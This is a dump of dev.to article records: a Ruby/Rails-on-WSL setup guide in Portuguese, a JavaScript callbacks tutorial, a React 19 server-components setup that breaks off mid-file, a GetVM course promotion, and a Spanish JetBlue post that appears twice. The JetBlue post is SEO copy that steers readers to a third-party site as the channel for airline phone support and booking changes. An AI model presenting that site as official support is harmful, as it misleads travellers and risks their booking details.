id
int64
5
1.93M
title
stringlengths
0
128
description
stringlengths
0
25.5k
collection_id
int64
0
28.1k
published_timestamp
timestamp[s]
canonical_url
stringlengths
14
581
tag_list
stringlengths
0
120
body_markdown
stringlengths
0
716k
user_username
stringlengths
2
30
1,912,240
¿Cómo cambiar mi nombre por teléfono con JetBlue?
Cambiar o corregir su nombre es obligatorio para las reservas de vuelos con JetBlue . La aerolínea...
0
2024-07-05T04:33:58
https://dev.to/flightsyo/como-cambiar-mi-nombre-por-telefono-con-jetblue-3fjf
airtravravel, tickets, cheap, flight
Cambiar o corregir su nombre es obligatorio para las reservas de vuelos con JetBlue . La aerolínea sólo te permitirá embarcar con el nombre correcto. Deberá corregir o cambiar su nombre de acuerdo con su pasaporte, identificación y otros documentos aprobados por el gobierno. Puede realizar cambios en su nombre de varias maneras, pero la forma más efectiva es cambiarlo por teléfono. La aerolínea opera un número de línea de ayuda exclusivo en varias regiones para ayudarlo. **¿Cómo hacer cambios en tu nombre usando el teléfono JetBlue en español?** Puedes realizar cambios por teléfono utilizando el **[JetBlue en español telefono](https://www.flightyo.com/es/espanol/jetblue-en-espanol-telefono/)** número. Llame al número de la línea de ayuda exclusiva y conéctese con un agente disponible. El equipo le atenderá y le ayudará a corregir o cambiar su nombre. Para ello, necesitarás compartir el código de confirmación de la reserva y tu apellido. Esta información ayudará a la aerolínea a recuperar su número de reserva y a realizar los cambios necesarios en su nombre. Es posible que deba compartir documentos de respaldo, como certificado de nacimiento, documentos legales o pasaporte, como prueba. **¿Está disponible el cambio o cancelación de vuelo a través del servicio de atención al cliente de JetBlue?** Sí. Puede cambiar su vuelo o cancelar su próximo horario con la ayuda del equipo de atención al cliente de JetBlue . Para gestionar la frecuencia de las llamadas, la aerolínea opera numerosos números de línea de ayuda exclusivos. También puedes utilizar el número de **[JetBlue Teléfono Puerto Rico](https://www.flightyo.com/es/articulos/jetblue-telefono-puerto-rico/)** para resolver tus inquietudes relacionadas con cambios o cancelaciones. Para ello, deberá compartir sus credenciales de reserva con el equipo de atención al cliente y buscar ayuda para resolver el problema lo antes posible. Si tiene alguna duda relacionada con algún problema de viaje, simplemente comuníquese con el equipo y resuélvalo sabiamente. **Evolver** Puede realizar cambios en su nombre, fecha y otros aspectos de su itinerario conectándose con el equipo de atención al cliente de JetBlue . Acércate a ellos y haz todos los arreglos necesarios cómodamente. Si tienes alguna duda o pregunta, ponte en contacto con el equipo de atención al cliente, ellos te ayudarán a resolver tus inquietudes cómodamente y realizar todos los ajustes necesarios.
flightsyo
1,912,239
¿Cómo cambiar mi nombre por teléfono con JetBlue?
Cambiar o corregir su nombre es obligatorio para las reservas de vuelos con JetBlue . La aerolínea...
0
2024-07-05T04:33:55
https://dev.to/flightsyo/como-cambiar-mi-nombre-por-telefono-con-jetblue-3pdg
airtravravel, tickets, cheap, flight
Cambiar o corregir su nombre es obligatorio para las reservas de vuelos con JetBlue . La aerolínea sólo te permitirá embarcar con el nombre correcto. Deberá corregir o cambiar su nombre de acuerdo con su pasaporte, identificación y otros documentos aprobados por el gobierno. Puede realizar cambios en su nombre de varias maneras, pero la forma más efectiva es cambiarlo por teléfono. La aerolínea opera un número de línea de ayuda exclusivo en varias regiones para ayudarlo. **¿Cómo hacer cambios en tu nombre usando el teléfono JetBlue en español?** Puedes realizar cambios por teléfono utilizando el **[JetBlue en español telefono](https://www.flightyo.com/es/espanol/jetblue-en-espanol-telefono/)** número. Llame al número de la línea de ayuda exclusiva y conéctese con un agente disponible. El equipo le atenderá y le ayudará a corregir o cambiar su nombre. Para ello, necesitarás compartir el código de confirmación de la reserva y tu apellido. Esta información ayudará a la aerolínea a recuperar su número de reserva y a realizar los cambios necesarios en su nombre. Es posible que deba compartir documentos de respaldo, como certificado de nacimiento, documentos legales o pasaporte, como prueba. **¿Está disponible el cambio o cancelación de vuelo a través del servicio de atención al cliente de JetBlue?** Sí. Puede cambiar su vuelo o cancelar su próximo horario con la ayuda del equipo de atención al cliente de JetBlue . Para gestionar la frecuencia de las llamadas, la aerolínea opera numerosos números de línea de ayuda exclusivos. También puedes utilizar el número de **[JetBlue Teléfono Puerto Rico](https://www.flightyo.com/es/articulos/jetblue-telefono-puerto-rico/)** para resolver tus inquietudes relacionadas con cambios o cancelaciones. Para ello, deberá compartir sus credenciales de reserva con el equipo de atención al cliente y buscar ayuda para resolver el problema lo antes posible. Si tiene alguna duda relacionada con algún problema de viaje, simplemente comuníquese con el equipo y resuélvalo sabiamente. **Evolver** Puede realizar cambios en su nombre, fecha y otros aspectos de su itinerario conectándose con el equipo de atención al cliente de JetBlue . Acércate a ellos y haz todos los arreglos necesarios cómodamente. Si tienes alguna duda o pregunta, ponte en contacto con el equipo de atención al cliente, ellos te ayudarán a resolver tus inquietudes cómodamente y realizar todos los ajustes necesarios.
flightsyo
1,912,238
Unlock the Power of Digital Image Processing with UC Berkeley's EE225B Course 🚀
Comprehensive digital image processing course at UC Berkeley, covering fundamental concepts, hands-on experience, and valuable skills for computer vision, image analysis, and multimedia applications.
27,844
2024-07-05T04:31:58
https://getvm.io/tutorials/ee225b-digital-image-processing-spring-2014-uc-berkeley
getvm, programming, freetutorial, universitycourses
As a passionate learner, I'm thrilled to share with you an incredible resource that has the potential to transform your understanding of digital image processing. Introducing the EE225B course offered at the prestigious University of California, Berkeley! ![MindMap](https://internal-api-drive-stream.feishu.cn/space/api/box/stream/download/authcode/?code=NTc0YTBlOTQ0ZGZlNGYzNDMwZGQ3YmZiYzg3OTUyZTlfMTBmMWYxNGViZDM5ZmUwNTQxMDk1N2M4YmE0NGRmZjdfSUQ6NzM4ODAwNDc0OTA3NTU2MjUyNF8xNzIwMTUzOTE3OjE3MjAyNDAzMTdfVjM) ## Comprehensive Coverage of Digital Image Processing This course is a comprehensive deep dive into the world of digital image processing, covering a wide range of fundamental concepts and techniques. From image acquisition and enhancement to restoration, compression, and analysis, you'll gain a solid understanding of the principles that underpin this dynamic field. 💻 ## Hands-On Experience with Image Processing Algorithms and Tools But it's not just about the theory – the EE225B course also provides you with invaluable hands-on experience. You'll have the opportunity to work with cutting-edge image processing algorithms and tools, allowing you to put your newfound knowledge into practice. This practical approach will give you a competitive edge in the ever-evolving landscape of computer vision, image analysis, and multimedia applications. 🛠️ ## Taught by Experienced Faculty at a Top-Ranked Engineering School The course is led by experienced faculty members at UC Berkeley, a top-ranked engineering school renowned for its excellence in research and education. You'll have the chance to learn from the best, gaining insights and guidance from experts in the field. This is an opportunity to immerse yourself in a world-class learning environment and unlock your full potential. 🎓 ## Recommendation Whether you're a student aspiring to a career in computer vision, image analysis, or multimedia, or a professional looking to enhance your skillset, the EE225B course is a must-attend. It will provide you with a strong foundation in the principles and practice of digital image processing, equipping you with the knowledge and tools to tackle the challenges of the modern digital landscape. Don't miss out on this incredible opportunity – enroll in the EE225B course today and embark on a transformative journey into the world of digital image processing! 🌟 Course link: [https://inst.eecs.berkeley.edu/~ee225b/sp14/](https://inst.eecs.berkeley.edu/~ee225b/sp14/) ## Supercharge Your Learning with GetVM's Playground 🚀 While the EE225B course from UC Berkeley provides a comprehensive foundation in digital image processing, the real magic happens when you pair it with GetVM's powerful Playground. This Chrome browser extension offers an online coding environment that allows you to seamlessly apply the concepts you learn and experiment with hands-on projects. With GetVM's Playground, you can dive into the course materials and immediately put them into practice. No more switching between multiple windows or applications – everything you need is right at your fingertips. The intuitive interface and real-time feedback make it easy to test your understanding, debug your code, and explore the nuances of digital image processing. But the true advantage of using GetVM's Playground goes beyond just convenience. By integrating the course content with a robust coding environment, you'll be able to deepen your learning and solidify your skills. The ability to instantly apply what you've learned, tinker with algorithms, and see the results in real-time will accelerate your progress and help you become a true master of digital image processing. So, as you embark on your journey through the EE225B course, be sure to leverage the power of GetVM's Playground. It's the perfect companion to unlock your full potential and transform your understanding of this fascinating field. Start your learning adventure today by visiting the [EE225B Digital Image Processing Playground](https://getvm.io/tutorials/ee225b-digital-image-processing-spring-2014-uc-berkeley) and let the exploration begin! 🌟 --- ## Practice Now! - 🔗 Visit [Digital Image Processing | UC Berkeley EE225B Course](https://inst.eecs.berkeley.edu/~ee225b/sp14/) original website - 🚀 Practice [Digital Image Processing | UC Berkeley EE225B Course](https://getvm.io/tutorials/ee225b-digital-image-processing-spring-2014-uc-berkeley) on GetVM - 📖 Explore More [Free Resources on GetVM](https://getvm.io/explore) Join our [Discord](https://discord.gg/XxKAAFWVNu) or tweet us [@GetVM](https://x.com/getvmio) ! 😄
getvm
1,912,237
Looking to Contribute to Open Source Startups Using .NET and Angular
Hi everyone, I'm Jawad, a junior software engineer with a passion for .NET and Angular. With 3 years...
0
2024-07-05T04:23:31
https://dev.to/jawad_hayat/looking-to-contribute-to-open-source-startups-using-net-and-angular-hf8
dotnet, csharp, angular, opensource
Hi everyone, I'm Jawad, a junior software engineer with a passion for .NET and Angular. With 3 years of experience in machine learning, app support, and .NET development, I'm eager to contribute to open source startups. I'm looking for startups using .NET and Angular to contribute to and grow my skills. Any recommendations? Thanks!
jawad_hayat
1,912,145
Setup para Ruby / Rails: Windows + WSL
Setup para Ruby / Rails: Windows + WSL Este artigo descreve como configurar um ambiente de...
27,960
2024-07-05T03:22:40
https://dev.to/serradura/setup-para-ruby-rails-windows-wsl-479l
beginners, ruby, rails, braziliandevs
# Setup para Ruby / Rails: Windows + WSL Este artigo descreve como configurar um ambiente de desenvolvimento Ruby / Rails no Windows 11 com WSL. Ele inclui a instalação do Visual Studio Code, Asdf, Ruby, NodeJS, SQLite, Rails e Ruby LSP (plugin para o VSCode). Antes de começarmos a copiar e colar os comandos no terminal, será preciso habilitar o Hyper-V e fazer a instalação do Windows Terminal e Visual Studio Code (todos os passos estão descritos abaixo). Caso tenha alguma dúvida, problema fique à vontade para deixar um comentário que eu tentarei te ajudar. 😊 Caso você já tenha o WSL + Ubuntu instalado e configurado, você pode pular para a seção ["Configurando o editor padrão do Ubuntu"](#configurando-o-editor-padrão-do-ubuntu). ## Habilitando o Hyper-V O Hyper-V é uma tecnologia de virtualização que permite executar máquinas virtuais no Windows. Ele é necessário para o WSL 2, que é a versão mais recente do Windows Subsystem for Linux. Para habilitá-lo, siga os passos abaixo: **1)** Escreva `appwiz.cpl` no campo de busca e pressione Enter. ![Procurando appwiz.cpl no campo de busca](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/vjmzz551e217oynd82o4.png) **2)** Click em "Ativar ou desativar recursos do Windows", marque a caixa "Hyper-V" e clique em OK. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/v48h3fjhirkvu2o8bpxr.jpg) ## Instalando o Windows Terminal O Windows Terminal é um aplicativo que permite abrir várias abas de terminal em uma única janela. Ele é muito útil para alternar entre o terminal do Windows e o WSL. Para instalá-lo, siga os passos abaixo: **1)** Acesse a Microsoft Store. ![Microsoft Store](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/3z2niw7op2ed16mbue27.jpg) **2)** Procure por `Windows Terminal` e instale o aplicativo. ![Procurando pelo Windows Terminal](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/444o6fku18e9lp9n3ljc.jpg) ## Instalando o WSL (Windows Subsystem for Linux 2) O WSL é um recurso que permite executar aplicativos Linux no Windows. Será através dele que iremos instalar o Ruby, Rails e outras ferramentas de desenvolvimento. Para instalá-lo, siga os passos abaixo: **1)** Procure por "Windows Terminal" no campo de busca do Windows, clique com o botão direito do mouse e selecione "Executar como administrador". ![Abrindo terminal como administrador](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/hy2zr2oc2da4q4t1k0dj.png) **2)** Execute: `wsl --install -d Ubuntu` ![Instalando WSL + Ubuntu](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/sgbo8re69q1fiygbl14q.png) **3)** Após a instalação, aparecerá uma mensagem pedindo para definir o usuário e senha do Ubuntu. Faça isso e anote essas informações, pois serão necessárias para acessar o WSL. ![Definindo usuário e senha do Ubuntu](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/48n0j47b5cz05gik2ud7.jpg) **4)** Ao finalizar você será conectado automaticamente ao Ubuntu. ## Instalando o Visual Studio Code O Visual Studio Code é um editor de código-fonte desenvolvido pela Microsoft. Ele é muito popular entre os desenvolvedores Ruby / Rails por ser leve, rápido e ter uma grande quantidade de extensões. Para instalá-lo, siga os passos abaixo: **1)** No Microsoft Store, procure por "Visual Studio Code" e instale o aplicativo. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/0t1pyfgn61io4gnuphno.jpg) **2)** Após a instalação, abra o Visual Studio Code e instale a extensão do WSL. ![Instalando a extensão do WSL no VSCode](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/8fmb4jw37a61hyax6eef.jpg) ## Habilitando Ubuntu como padrão no Windows Terminal **1)** Abra o Windows Terminal. Clique na seta para baixo no canto superior direito (ao lado da aba) e selecione "Configurações". **2)** Vá para Startup > Default profile e altere o valor para "Ubuntu". ![Habilitando Ubuntu como terminal padrão](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/hdxd9u8ttmu05lxh52pc.png) **3)** Feche e abra o Windows Terminal novamente para aplicar as alterações. Você verá que o terminal padrão agora é o Ubuntu. ![Ubuntu como terminal padrão](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/wf9pehdmd066fosgv8hy.png) ## Configurando o editor padrão do Ubuntu > Desse ponto em diante, **todos os comandos serão executados no terminal do Ubuntu.** Para facilitar a edição de arquivos, vamos configurar o Visual Studio Code como editor padrão do terminal. Para isso, basta copiar e colar os comandos abaixo no terminal: ```sh # Atualize a lista de pacotes com as versões mais recentes sudo apt update # Adicione o Visual Studio Code como editor padrão do terminal echo 'export EDITOR="code --wait"' >> ~/.bashrc # Recarregue o arquivo de configuração do terminal . ~/.bashrc ``` ## Instalação do Asdf asdf é um gerenciador de ferramentas e suas diferentes versões. Ele permite instalar, gerenciar e alternar entre várias versões de Ruby, NodeJS, dentre outros programas e linguagens de programação. Execute os comandos abaixo para fazer a sua instalação. ```sh # Instale o Git e o Curl sudo apt install -y curl git # Instale o asdf # -- https://asdf-vm.com/guide/getting-started.html#_2-download-asdf git clone https://github.com/asdf-vm/asdf.git ~/.asdf --branch v0.14.0 # Configure o asdf para inicializar no terminal echo '. "$HOME/.asdf/asdf.sh"' >> ~/.bashrc # Configure o autocomplete do asdf echo '. "$HOME/.asdf/completions/asdf.bash"' >> ~/.bashrc # Recarregue o terminal . ~/.bashrc ``` ## Instalação do Ruby Ruby é a linguagem de programação utilizada no framework Ruby on Rails. Os comandos abaixo instalam a última versão do Ruby e a definem como a padrão do sistema. ```sh # Instale as dependências de compilação # -- https://github.com/rbenv/ruby-build/wiki#ubuntudebianmint sudo apt install -y autoconf patch build-essential rustc libssl-dev libyaml-dev libreadline6-dev zlib1g-dev libgmp-dev libncurses5-dev libffi-dev libgdbm6 libgdbm-dev libdb-dev uuid-dev # Adicione o plugin ao asdf asdf plugin add ruby # Instale a última versão asdf install ruby latest:3 ``` Após a instalação, execute os comandos abaixo para definir a versão padrão do Ruby e atualizar o RubyGems (gerenciador de bibliotecas do Ruby). ```sh # Verifique a versão que foi instalada asdf list ruby # Deverá aparecer algo como: # 3.3.3 # Defina essa versão como a padrão do sistema asdf global ruby 3.3.3 # Atualize o RubyGems gem update --system # Verifique a versão padrão ruby -v ``` ## Instalação do NodeJS NodeJS é uma plataforma de desenvolvimento de aplicações em JavaScript. O node (ou nodejs) é utilizado pelo Rails para compilar assets (como CSS e JavaScript). Os comandos abaixo instalam a última versão e a definem como a padrão do sistema. ```ruby # Instale as dependências de compilação # -- https://github.com/nodejs/node/blob/main/BUILDING.md#building-nodejs-on-supported-platforms sudo apt install -y python3 g++ make python3-pip # Adicione o plugin ao asdf asdf plugin add nodejs # Instale a última versão asdf install nodejs latest # Verifique a versão que foi instalada asdf list nodejs # Deverá aparecer algo como: # 22.3.0 # Defina essa versão como a padrão do sistema asdf global nodejs 22.3.0 # Faça a instalação do yarn npm install -g yarn # Verifique a versão padrão node -v ``` ## Instalação do SQLite SQLite é um banco de dados SQL embutido. Ou seja, ele é um banco de dados que não requer um servidor separado já que tudo é armazenado em um único arquivo. ```sh sudo apt install -y sqlite3 ``` ## Instalação do Ruby LSP no Visual Studio Code O Ruby LSP é um plugin para VSCode que fornece recursos como autocompletar, formatação dentre outros, tanto para Ruby quanto para Rails. ```sh # Instale a gem do Ruby LSP gem install ruby-lsp # Instale a extensão do Ruby LSP no Visual Studio Code code --install-extension shopify.ruby-lsp ``` ## Instalação do Rails ```sh gem install rails # Verifique a versão que foi instalada rails -v ``` ## Criando um projeto Rails Visando testar a instalação do Ruby e do Rails, vamos criar um projeto para verificar se tudo está funcionando. ```sh # Vá para o diretório home cd ~ # Crie uma pasta para organizar seus projetos mkdir Workspace # Entre na pasta cd Workspace # Crie um novo projeto Rails # O banco de dados padrão é o SQLite rails new myapp # Acesse a pasta do projeto cd myapp # Crie o banco de dados bin/rails db:create # Inicie o servidor bin/rails s ``` Abra outra aba no terminal e execute o comando para acessar a aplicação no navegador: ```sh explorer.exe http://localhost:3000 ``` ### Criando um gerenciador de contatos ```sh # Crie um scaffold para a entidade Person bin/rails g scaffold Person first_name last_name email birthdate:date # Execute as migrações para criar a tabela no banco de dados bin/rails db:migrate # Inicie o servidor (caso não esteja rodando) # bin/rails s # Acesse o gerenciador de contatos no navegador explorer.exe http://localhost:3000/people ``` Navegue pelo sistema e teste as funcionalidades de listagem, cadastro, visualização, edição e exclusão de contatos. ### Melhorando a aparência da aplicação Visando melhorar o visual do sistema, vamos adicionar o Pico CSS versão class-less, que como o nome sugere não faz uso classes CSS. Ou seja, basta adicionar as tags HTML para obter um estilo bonito e padronizado. ```sh # Dentro da pasta do projeto cd ~/Workspace/myapp # Abra o VSCode code . ``` Dentro do VSCode, abra o arquivo `app/views/layouts/application.html.erb` (utilize o `Ctrl` + `p` para buscar o arquivo) e adicione o seguinte trecho de código dentro da tag.`<head>`: ```html <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@picocss/pico@2/css/pico.classless.min.css" /> ``` Nesse mesmo arquivo, envolva o conteúdo da tag `<body>` com uma tag `<main>`: ```html <body> <main><%= yield %></main> </body> ``` Após essas alterações, acesse o navegador e recarregue para ver o novo visual de todas as páginas do sistema. ### Adicionando validações ao modelo Person Embora funcional, o gerenciador de cadastro não possui validações. Vamos adicionar algumas para garantir que os dados informados sejam válidos. Através do VSCode, abra o arquivo `app/models/person.rb` (utilize o `Ctrl` + `p` para buscar o arquivo) e adicione as validações: ```ruby validates :first_name, :last_name, presence: true validates :email, format: /@/, allow_blank: true ``` Volte o navegador e tente cadastrar/editar uma pessoa sem informar o nome ou o e-mail (sem `@`). ## Conclusão Viu como foi simples configurar um ambiente de desenvolvimento Ruby / Rails no Windows 11 + WSL? Curtiu, então acesse as referências abaixo para obter mais informações sobre cada um dos programas e linguagens utilizadas. Você sente dificuldades com inglês? Acesse esse outro post para aprender [como traduzir conteúdos técnicos de forma prática através do Google Translator](https://serradura.github.io/pt-BR/blog/traduzindo_conteudo_tecnico_com_google_translator/). Gostou do conteúdo? Tem outra dica? Então deixe seu comentário aqui embaixo. Valeu! 😉 > **Nota**: Este artigo foi escrito com base no Ubuntu 22.04. Caso você esteja utilizando outra versão, os comandos podem não funcionar corretamente. Caso encontre algum problema, deixe um comentário que eu tentarei te ajudar. 😊 ## Referências: A lista abaixo contém os sites de referência utilizados para a criação deste documento. Ela segue a ordem de aparição no post. - [Visual Studio Code](https://code.visualstudio.com/) - [Asdf](https://asdf-vm.com/guide/getting-started.html) - [Ruby](https://www.ruby-lang.org/en/) ([Versões](https://www.ruby-lang.org/en/downloads/releases/)) - [NodeJS](https://nodejs.org/en/) - ([Versões](https://nodejs.org/en/download/releases/)) - [SQLite](https://www.sqlite.org/index.html) - [Ruby LSP](https://marketplace.visualstudio.com/items?itemName=Shopify.ruby-lsp) - [Ruby on Rails](https://rubyonrails.org/) - ([Getting Started](https://guides.rubyonrails.org/getting_started.html)) - [Pico CSS](https://picocss.com/) --- Já ouviu falar do **ada.rb - Arquitetura e Design de Aplicações em Ruby**? É um grupo focado em práticas de engenharia de software com Ruby. Acesse o <a href="https://t.me/ruby_arch_design_br" target="_blank">canal no telegram</a> e junte-se a nós em nossos <a href="https://meetup.com/pt-BR/arquitetura-e-design-de-aplicacoes-ruby/" target="_blank">meetups</a> 100% on-line. ---
serradura
1,912,236
Simple Guide to Callback function in Javascript
In the ever-evolving landscape of web development, creating applications that deliver real-time...
0
2024-07-05T04:22:56
https://dev.to/srijan_karki/unlocking-the-power-of-asynchronous-javascript-callback-functions-promises-and-asyncawait-5fgj
webdev, javascript, beginners, programming
In the ever-evolving landscape of web development, creating applications that deliver real-time data—such as weather apps or live sports dashboards—demands a robust approach to handling asynchronous operations. JavaScript's prowess in managing these operations through callback functions, Promises, and async/await is indispensable. This article delves into these essential concepts, providing a thorough understanding of their mechanics and significance in modern JavaScript development. ![image] (https://www.elegantthemes.com/blog/wp-content/uploads/2018/09/request-callback.png) ## Table of Contents 1. [Understanding Callback Functions](#understanding-callback-functions) 2. [The Necessity of Callback Functions](#the-necessity-of-callback-functions) 3. [Constructing a Basic Callback Function](#constructing-a-basic-callback-function) 4. [Mechanics of Callbacks](#mechanics-of-callbacks) 5. [Error Handling with Callbacks](#error-handling-with-callbacks) 6. [Navigating Callback Hell](#navigating-callback-hell) 7. [Harnessing Promises for Better Control](#harnessing-promises-for-better-control) 8. [Streamlining with Async/Await](#streamlining-with-asyncawait) 9. [Wrapping Up](#wrapping-up) ## Understanding Callback Functions Imagine you're hosting a party and you order a pizza. You tell the pizza place to call you back when it's ready. While you wait, you continue to enjoy the party, mingling with guests and having fun. When the pizza is finally ready, the pizza place calls you back to let you know. In JavaScript, a callback function works similarly. You pass a function (the callback) to another function to be executed later, allowing your code to continue running without waiting for that function to finish its task. When the task is complete, the callback function is called, just like the pizza place calling you back when your pizza is ready. ![Pizza GIF](https://media2.giphy.com/media/lp8Kl4PZ8kY8pRr6Q2/giphy.gif?cid=6c09b952ibf2fjifxhu29mrm16zepv9y4mi9i0owut96al7p&ep=v1_gifs_search&rid=giphy.gif&ct=g) A callback function is a function passed as an argument to another function, which is executed after the completion of a specified task. This capability allows JavaScript to handle tasks such as file reading, HTTP requests, or user input processing without blocking the program's execution, thereby ensuring a seamless user experience. ## The Necessity of Callback Functions JavaScript operates in a single-threaded environment, processing one command at a time. Callback functions are vital for managing asynchronous operations, allowing the program to continue running smoothly without waiting for tasks to complete. This approach is crucial for maintaining a responsive and efficient application, especially in web development. ## Constructing a Basic Callback Function Consider the following example to understand the basic structure of a callback function: ```javascript function fetchDataFromAPI(apiUrl, callback) { console.log(`Fetching data from ${apiUrl}...`); // Simulate an asynchronous operation setTimeout(() => { const data = { temperature: 25, condition: "Sunny" }; callback(data); }, 1000); } function displayWeather(data) { console.log(`The weather is ${data.condition} with a temperature of ${data.temperature}°C.`); } fetchDataFromAPI("https://api.weather.com", displayWeather); ``` In this example: - The `fetchDataFromAPI` function takes an `apiUrl` and a `callback` function as arguments. - After simulating data fetching, it calls the callback function with the fetched data. ## Mechanics of Callbacks 1. **Passing the Function**: The desired function is passed as an argument to another function. 2. **Executing the Callback**: The main function executes the callback function at the appropriate time, such as after a delay, upon task completion, or when an event occurs. Here’s a more detailed example with a simulated asynchronous operation using `setTimeout`: ```javascript function processOrder(orderId, callback) { console.log(`Processing order #${orderId}...`); // Simulate an asynchronous operation setTimeout(() => { const status = "Order completed"; callback(status); }, 1500); } function updateOrderStatus(status) { console.log(`Order status: ${status}`); } processOrder(12345, updateOrderStatus); ``` In this scenario: - `processOrder` simulates order processing after a 1.5-second delay. - The callback function updates the order status once the processing is done. ## Error Handling with Callbacks Handling errors is a critical aspect of real-world applications. A common pattern involves passing an error as the first argument to the callback function: ```javascript function readFileContent(filePath, callback) { const fs = require('fs'); fs.readFile(filePath, 'utf8', (err, data) => { if (err) { callback(err, null); } else { callback(null, data); } }); } readFileContent('sample.txt', (err, data) => { if (err) { console.error("Error reading file:", err); } else { console.log("File content:", data); } }); ``` In this code: - The `readFileContent` function reads a file asynchronously. - It calls the callback with an error (if any) or the file data. ## Navigating Callback Hell As applications scale, managing multiple nested callbacks can become complex and hard to maintain, a situation often referred to as "callback hell": ```javascript function stepOne(callback) { setTimeout(() => callback(null, 'Step One Completed'), 1000); } function stepTwo(callback) { setTimeout(() => callback(null, 'Step Two Completed'), 1000); } function stepThree(callback) { setTimeout(() => callback(null, 'Step Three Completed'), 1000); } stepOne((err, result) => { if (err) return console.error(err); console.log(result); stepTwo((err, result) => { if (err) return console.error(err); console.log(result); stepThree((err, result) => { if (err) return console.error(err); console.log(result); }); }); }); ``` This code is difficult to read and maintain. Modern JavaScript addresses this issue with Promises and async/await syntax, offering cleaner and more manageable code. ## Harnessing Promises for Better Control Promises represent the eventual completion (or failure) of an asynchronous operation and its resulting value: ```javascript function fetchUserData() { return new Promise((resolve, reject) => { setTimeout(() => { const success = true; if (success) { resolve({ id: 1, username: "john_doe" }); } else { reject("Failed to fetch user data"); } }, 1000); }); } fetchUserData() .then(data => { console.log("User data received:", data); }) .catch(error => { console.error("Error:", error); }); ``` ## Streamlining with Async/Await Async/await syntax simplifies working with Promises: ```javascript async function getUserData() { try { const data = await fetchUserData(); console.log("User data received:", data); } catch (error) { console.error("Error:", error); } } getUserData(); ``` This approach makes asynchronous code resemble synchronous code, enhancing readability and maintainability. ## Wrapping Up Callback functions are foundational in JavaScript for handling asynchronous operations. While they provide a powerful way to manage asynchronous flow, they can become unwieldy. Utilizing Promises and async/await syntax can streamline your code, making it cleaner and easier to manage. Mastering these concepts will empower you to write more efficient and maintainable JavaScript code, a crucial skill in the realm of modern web development. By understanding and leveraging callback functions, Promises, and async/await, you can ensure your applications are responsive, efficient, and capable of handling real-time data effectively.
srijan_karki
1,912,235
React 19 setup and use of server actions
TLDR: Github repo npm init -y Create a folder and run npm init -y in it. ...
0
2024-07-05T04:22:45
https://dev.to/roggc/use-react-19-with-server-components-without-a-framework-cl8
react
TLDR: [Github repo](https://github.com/roggc/react-19) ## `npm init -y` Create a folder and run `npm init -y` in it. ## Install dependencies Install the dependencies with the following command: ```bash npm i webpack webpack-cli react@rc react-dom@rc react-server-dom-webpack@rc babel-loader @babel/core @babel/register @babel/preset-react @babel/plugin-transform-modules-commonjs express ``` ## Configure Babel Add this to your `package.json`: ```json "babel": { "presets": [ [ "@babel/preset-react", { "runtime": "automatic" } ] ] } ``` ## Add scripts to `package.json` Add the following scripts to your `package.json`: ```json "dev": "webpack -w", "start": "node --conditions react-server server/server.js" ``` ## This is how your `package.json` must look ```json { "name": "react-19-essay", "version": "1.0.0", "description": "", "main": "index.js", "scripts": { "test": "echo \"Error: no test specified\" && exit 1", "dev": "webpack -w", "start": "node --conditions react-server server/server.js" }, "author": "", "license": "ISC", "dependencies": { "@babel/core": "^7.24.7", "@babel/plugin-transform-modules-commonjs": "^7.24.7", "@babel/preset-react": "^7.24.7", "@babel/register": "^7.24.6", "babel-loader": "^9.1.3", "express": "^4.19.2", "react": "^19.0.0-rc-f38c22b244-20240704", "react-dom": "^19.0.0-rc-f38c22b244-20240704", "react-server-dom-webpack": "^19.0.0-rc-f38c22b244-20240704", "webpack": "^5.92.1", "webpack-cli": "^5.1.4" }, "babel": { "presets": [ [ "@babel/preset-react", { "runtime": "automatic" } ] ] } } ``` ## Create the `webpack.config.js` file At the root of the project, create a `webpack.config.js` file with the following content: ```javascript const path = require("path"); const ReactServerWebpackPlugin = require("react-server-dom-webpack/plugin"); module.exports = { mode: "development", entry: [path.resolve(__dirname, "./src/index.js")], output: { path: path.resolve(__dirname, "./public"), filename: "main.js", }, module: { rules: [ { test: /\.js$/, use: "babel-loader", exclude: /node_modules/, }, ], }, plugins: [new ReactServerWebpackPlugin({ isServer: false })], }; ``` From the look to this configuration file, we know we need a `src/index.js` file. ## Create a `src/index.js` file Create a `src` folder and put in it the following file (`index.js`): ```javascript import { use } from "react"; import { createFromFetch } from "react-server-dom-webpack/client"; import { createRoot } from "react-dom/client"; const root = createRoot(document.getElementById("root")); root.render(<Root />); const cache = new Map(); function Root() { let content = cache.get("home"); if (!content) { content = createFromFetch(fetch("/react")); cache.set("home", content); } return <>{use(content)}</>; } ``` You see how we use `createFromFetch` from `react-server-dom-webpack/client`. You also see how we fetch to `/react` endpoint. ## Create a `server/server.js` file Create a `server` folder and put in it the following file (`server.js`): ```javascript const register = require("react-server-dom-webpack/node-register"); register(); const path = require("path"); const { readFileSync } = require("fs"); const babelRegister = require("@babel/register"); babelRegister({ ignore: [/[\\\/](build|server|node_modules)[\\\/]/], presets: [["@babel/preset-react", { runtime: "automatic" }]], plugins: ["@babel/transform-modules-commonjs"], }); const { renderToPipeableStream } = require("react-server-dom-webpack/server"); const express = require("express"); const React = require("react"); const ReactApp = require("../src/app").default; const app = express(); app.get("/", (req, res) => { const html = readFileSync( path.resolve(__dirname, "../public/index.html"), "utf8" ); res.send(html); }); app.get("/react", (req, res) => { const manifest = readFileSync( path.resolve(__dirname, "../public/react-client-manifest.json"), "utf8" ); const moduleMap = JSON.parse(manifest); const { pipe } = renderToPipeableStream( React.createElement(ReactApp), moduleMap ); pipe(res); }); app.use(express.static(path.resolve(__dirname, "../public"))); const port = process.env.PORT || 3000; app.listen(port, () => console.log(`listening on port ${port}`)); ``` You see how we use `renderToPipeableStream` from `react-server-dom-webpack/server`. You also see how we require a `src/app.js` file. You also see how we use the `public` folder for static files. ## Create a `public/index.html` file Create a `public` file and put in it the following file (`index.html`): ```html <!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8" /> <meta name="description" content="React with Server Components" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> 